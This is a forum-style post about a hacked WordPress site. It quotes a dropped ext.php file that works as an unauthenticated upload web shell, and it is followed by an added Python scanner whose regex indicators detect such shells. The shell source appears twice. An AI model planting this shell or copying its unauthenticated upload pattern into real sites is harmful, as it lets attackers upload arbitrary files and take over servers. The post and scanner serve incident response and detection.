WordPress site hacked and admin users added

Our website was hacked, as I found out last week. Multiple users had been added (with admin rights). Since there were a lot of compromised files I decided to delete the site and use a backup that I know was clean. Having done this, I deleted the 'admin' user and created another admin account. I changed the FTP password and the root password on the hosted VPS. I upgraded to the newest version of WordPress and updated all plugins.

How frustrating to find today that again a number of users have been added with admin rights and several files have been copied to the website. There is a file called ext.php which serves as a file upload interface. It copies any file into the 'wp-admin' directory.

<?php
// Hide all PHP errors so the shell never reveals itself in error output.
error_reporting(0);
@ini_set("display_errors", 0);
// Target of the upload form. The $_SERVER index appears to have been lost when the post was copied.
$var = $_SERVER . "?";
$form = '<form enctype="multipart/form-data" action="' . $var . '" method="POST">'
      . '<input name="uploadFile" type="file"/>'
      . '<input type="submit" value="Upload" /></form>';
if (!empty($_FILES)) {
    // Write the uploaded file next to this script (here: wp-admin), keeping the client-supplied name.
    $self = dirname(__FILE__);
    move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self . DIRECTORY_SEPARATOR . $_FILES["uploadFile"]["name"]);
    $time = filemtime($self);
    print "OK";
} else {
    // No upload yet: show the form. There is no authentication of any kind.
    print $form;
}
?>

The .htaccess file (rewrite engine on) has been compromised and several folders are appearing, including a plugin 'customized admin'.

My conclusion therefore is to again restore from backup, but how do I prevent this hack from happening again? How does the first file appear on the server? Is this purely ACL on folders and files, or do 'they' use another method? Perhaps you guys know from experience how this works.

Probably coincidence, but the problem started after I put a Google validation cookie in the root to prove ownership of the domain.

Input appreciated
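The ext.php quoted in the post is a classic minimal upload shell: error output suppressed, no authentication, and anything posted to it is written next to the script with the client's file name. As an added example that is not part of the original post, the scanner below turns those traits into indicators and walks a WordPress tree looking for PHP files that carry them but no WordPress capability or nonce check. The three sample files it scans are constructed for the demo (the shell text from the post with its quotes normalised, a hypothetical plugin upload handler that gates the same `move_uploaded_file()` call, and a plain settings file); the directory layout and file names are assumptions, not anything from the poster's server.

```python
"""Scan a WordPress tree for unauthenticated PHP upload shells like the ext.php in the post."""
import os
import re
import tempfile

# Constructed sample 1: the ext.php shell quoted in the post, smart quotes made ASCII.
EXT_PHP = r'''<?php error_reporting(0);@ini_set("display_errors", 0);$var= $_SERVER."?";$form ='<form enctype="multipart/form-data" action="'.$var.'" method="POST"><input name="uploadFile" type="file"/>
<input type="submit" value="Upload" /></form>';if (!empty($_FILES)) {$self=dirname(__FILE__);move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);$time=filemtime($self);print "OK";} else {print $form;} ?>'''

# Constructed sample 2: a hypothetical plugin upload handler that gates the same
# move_uploaded_file() call behind a capability check and a nonce.
BENIGN_UPLOAD_PHP = r'''<?php
if ( ! current_user_can( 'upload_files' ) ) { wp_die( 'forbidden' ); }
check_admin_referer( 'demo_plugin_upload' );
move_uploaded_file( $_FILES['f']['tmp_name'], $dest );
'''

# Constructed sample 3: an ordinary file with nothing of interest.
PLAIN_PHP = "<?php\n$demo_setting = 'value';\n"

# Indicator name -> pattern. Each is a trait of the posted shell or of its common relatives.
INDICATORS = [
    ("error-suppression",
     re.compile(r'error_reporting\s*\(\s*0\s*\)|@?ini_set\s*\(\s*["\']display_errors["\']\s*,\s*0\s*\)')),
    ("raw-file-upload", re.compile(r'move_uploaded_file\s*\(\s*\$_FILES')),
    ("writes-beside-self", re.compile(r'dirname\s*\(\s*__FILE__\s*\)')),
    ("code-execution",
     re.compile(r'\b(?:eval|assert|system|passthru|shell_exec)\s*\(|\b(?:base64_decode|gzinflate)\s*\(')),
]
# WordPress calls a legitimate upload handler would normally make before touching $_FILES.
AUTH_CHECKS = re.compile(r'current_user_can|check_admin_referer|wp_verify_nonce|is_user_logged_in')


def scan_source(text):
    """Classify one PHP source. Returns the indicators hit, whether any auth check
    is present, and a verdict: 'shell', 'review' or 'clean'."""
    hits = [name for name, pat in INDICATORS if pat.search(text)]
    has_auth = bool(AUTH_CHECKS.search(text))
    dangerous = "raw-file-upload" in hits or "code-execution" in hits
    if dangerous and not has_auth:
        verdict = "shell"        # unauthenticated upload or execution primitive
    elif hits:
        verdict = "review"       # gated, but still worth a human look
    else:
        verdict = "clean"
    return {"indicators": hits, "has_auth_check": has_auth, "verdict": verdict}


def scan_tree(root):
    """Walk a WordPress install and return (relative path, verdict, indicators)
    for every .php file that is not clean, sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                result = scan_source(fh.read())
            if result["verdict"] != "clean":
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, result["verdict"], result["indicators"]))
    return sorted(findings)


def build_sample_tree():
    """Write the three constructed samples into a throwaway directory laid out like a
    WordPress install (assumed layout) and return its path."""
    root = tempfile.mkdtemp(prefix="wp-scan-demo-")
    samples = {
        "wp-admin/ext.php": EXT_PHP,
        "wp-content/plugins/demo/upload.php": BENIGN_UPLOAD_PHP,
        "wp-includes/demo-settings.php": PLAIN_PHP,
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, verdict, hits in scan_tree(build_sample_tree()):
        print(f"{verdict:6}  {rel}  [{', '.join(hits)}]")
```

Point `scan_tree()` at the document root of a restored site before it goes live and again on a schedule; the poster's ext.php is reported as `shell` because it hits the upload, self-directory and error-suppression indicators with no WordPress auth call in sight, while the gated plugin handler only earns a `review`. The scanner finds dropped files; it does not say how the first one arrived, which is what the web server's access log for the minutes before ext.php's mtime would show.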